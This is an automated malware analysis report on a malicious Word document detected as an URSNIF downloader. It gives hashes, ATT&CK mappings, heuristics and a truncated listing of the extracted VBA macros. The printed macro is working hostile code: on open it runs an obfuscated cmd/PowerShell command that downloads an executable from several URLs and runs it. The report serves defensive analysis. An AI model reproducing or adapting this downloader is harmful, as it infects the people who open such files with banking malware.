Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f102672d1eac888a…

MALICIOUS

Office (OLE)

68.4 KB Created: 2018-09-05 17:12:00 Authoring application: Microsoft Office Word First seen: 2019-04-18
MD5: d2294df087c6c78286226c666b258f4c SHA-1: 390075fd6b701496854361ae0c6653c1f30328d9 SHA-256: f102672d1eac888af58585e5ae3dc4b120f3fc2d75617ad153f6b4307a67ee22
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro that utilizes the Shell() function. This function is used to execute a command constructed from concatenated strings, which appears to be an attempt to download and execute a secondary payload. The ClamAV detection as 'Doc.Downloader.URSNIF-6729855-3' further supports its role as a downloader.

Heuristics 5

  • ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5594 bytes
SHA-256: cca52866c0689dd623ddfc81e0aea21333f06370c8afdfc5be9d3c29ee6402d6
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "SiIdjLsHAK"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
   Hour "uuSuaQKZE" + "BncbMW"
VBA.Shell CleanString(hDi) + zwTmzzLdznFhwK + uTFraNSZM + PpnsEQXZqY + AGVQCKssFIj + IUBNOzj + KkpCvlwSvGiM + AEAWtQMYWmkcSW, 49 - 49
   Hour "tab" + "Bs"
End Sub



Attribute VB_Name = "JwzrkHQGizaJ"
Function PpnsEQXZqY()

On _
Error _
Resume _
Next
Hour "ZMkz" + "2926" + "oncE" + "r"
   Hour "jjiqE" + "nspO"
   Hour "3588" + "tPzWXfm" + "l" + "zfbImra"
   Hour "28974550" + "Hr"
   Hour "ShbXJz" + "9282" + "ncm" + "sj"
uVOiE = "cmd /V^" + ":/" + "C" + Chr(1 + 1 + 0 + 3 + 29) + "s^e^" + "t ^x" + "^EA^" + "W=  ^ ^" + " ^ ^  ^"
Hour "OnjwGnTms" + "368963570"
   Hour "USQpkd" + "H" + "j" + "153240969"
   Hour "250687502" + "355239414" + "VzrIQkdUKw" + "vHF"
   Hour "168294423" + "tRlKDFJdBiuZiN"
RqNHfs = " ^" + "  ^ ^ ^" + " ^" + " ^" + "  ^ ^" + "}^}^{hc" + "t^ac" + "^}" + "^;k^"
Hour "sYqGoZVHdiPnNH" + "3576"
   Hour "EpwKmapp" + "309738681" + "160283557" + "N"
CjWudFLBi = "a^" + "erb;dP" + "H$ m^et" + "^I-^" + "e^k^ovn" + "^I;)" + "^d^" + "P" + "H^$ ,"
Hour "1816" + "3466"
   Hour "UKR" + "BwaKFcW"
   Hour "74348632" + "Wii"
   Hour "2798" + "J" + "Sq" + "SXqoABXWSRw"
jcPPirVHTA = "b^j^" + "E" + "^" + "$(^e^" + "l^i" + "^F^" + "d^a^o^l" + "n^w^oD^" + ".qN" + "l^$^{" + "^yr^" + "t^"
Hour "7029" + "jzZ"
   Hour "iiMo" + "302280330"
   Hour "zIrPjAoIqsz" + "IfAK"
   Hour "8058" + "371660783" + "ZDWPdNuU" + "PsqZtjNsV"
   Hour "6364" + "IQN" + "531461288" + "jwKFziPj"
Xziwl = "{)^F^" + "j^b" + "^$" + " n" + "i^" + " b^jE$(" + "^hc^" + "aero" + "^f^;"
Hour "OoZj" + "FkSp" + "Si" + "21463231"
   Hour "OU" + "PATDjvm"
   Hour "473416726" + "cJqqhf" + "EdGE" + "tjTuzwIrz"
   Hour "206375660" + "8193"
nLcdHR = "'^" + "exe" + "^" + ".^'" + "+" + "w^q^A" + "^" + "$^+^'" + "^\^" + "'^+c"
Hour "J" + "ziohCpcBIv" + "zto" + "bb"
   Hour "5165" + "ERZ" + "7124" + "7860"
   Hour "5733" + "PsV"
   Hour "297799450" + "325220545" + "lG" + "DZZ"
WkhWkNwr = "il^b^u^" + "p:vne" + "^$=d^PH" + "$;'^84^" + "7'^ ^=" + "^ ^wqA" + "^$;)'"
PpnsEQXZqY = uVOiE + RqNHfs + CjWudFLBi + jcPPirVHTA + Xziwl + nLcdHR + WkhWkNwr
   Hour "YJCZzTBQ" + "VdXc" + "7470" + "7750"
   Hour "270882754" + "wDQz"
   Hour "V" + "4266" + "2836" + "QkfH"
   Hour "OIUdd" + "Ff" + "DsSD" + "r"
End Function
Function AGVQCKssFIj()

On _
Error _
Resume _
Next
Hour "WFA" + "FBDORLnfsIjkfa" + "lziS" + "SJPGkC"
   Hour "Qs" + "WzkszfKuT" + "ZpkBb" + "105129519"
   Hour "CjT" + "205108452"
   Hour "9459" + "QldfrzZ" + "7697" + "4350"
dtRmmbaFF = "@'(^" + "t^i^lpS" + ".^'" + "^8d^13" + "^D3i" + "G4n/mo" + "c^.^s" + "^or" + "p^gn^" + "icru" + "^os^tu" + "^o" + "//:p^t"
Hour "XJYsnrmXfwlwd" + "fO"
   Hour "4524" + "H"
   Hour "F" + "T"
wimjjEoirr = "^th@j" + "^a^1zvZ" + "K^U/" + "^" + "gr^" + "o^.^m" + "^" + "u^i" + "so^" + "p^my^" + "sc^i^f^" + "ic"
Hour "l" + "278774964"
   Hour "311778797" + "5084"
   Hour "DnYArHmw" + "UjvSwpRmi"
   Hour "t" + "25240542"
   Hour "4289" + "XFbNzwiqfXAXw" + "tUU" + "Wubth"
kOLHVYZ = "a" + "^p" + ".ved/" + "/:^p" + "^tt^h@" + "F8^" + "F^k" + "^BL" + "WG^Z"
Hour "HuJYLYOARiXo" + "417210530"
   Hour "IFqo" + "OZ"
rwMFVaBQZXW = "/mc" + "^.t^e" + "ne" + "//^:pt" + "th@V4" + "mTWN9" + "Z^K" + "^i/^di." + "di^o"
Hour "4168" + "5105"
   Hour "Y" + "f"
   Hour "6180" + "6491" + "oKZZzvtP" + "500808604"
   Hour "XzdqJHv" + "j"
YAAJjrm = "^l" + "^b" + "a^t" + "//:p^" + "tth^@^S" + "^" + "p" + "H^lm^L" + "^4/ti" + ".a" + "rev^am" + "^i" + "r^"
AGVQCKssFIj = dtRmmbaFF + wimjjEoirr + kOLHVYZ + rwMFVaBQZXW + YAAJjrm
   Hour "Q" + "4667"
   Hour "372778731" + "219862146" + "tzRDdwAK" + "hYcTwOXBPqOJj"
   Hour "aaDRG" + "290404369"
   Hour "fahsQ" + "bUpqZ"
End Function
Function IUBNOzj()

On _
Error _
Resume
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.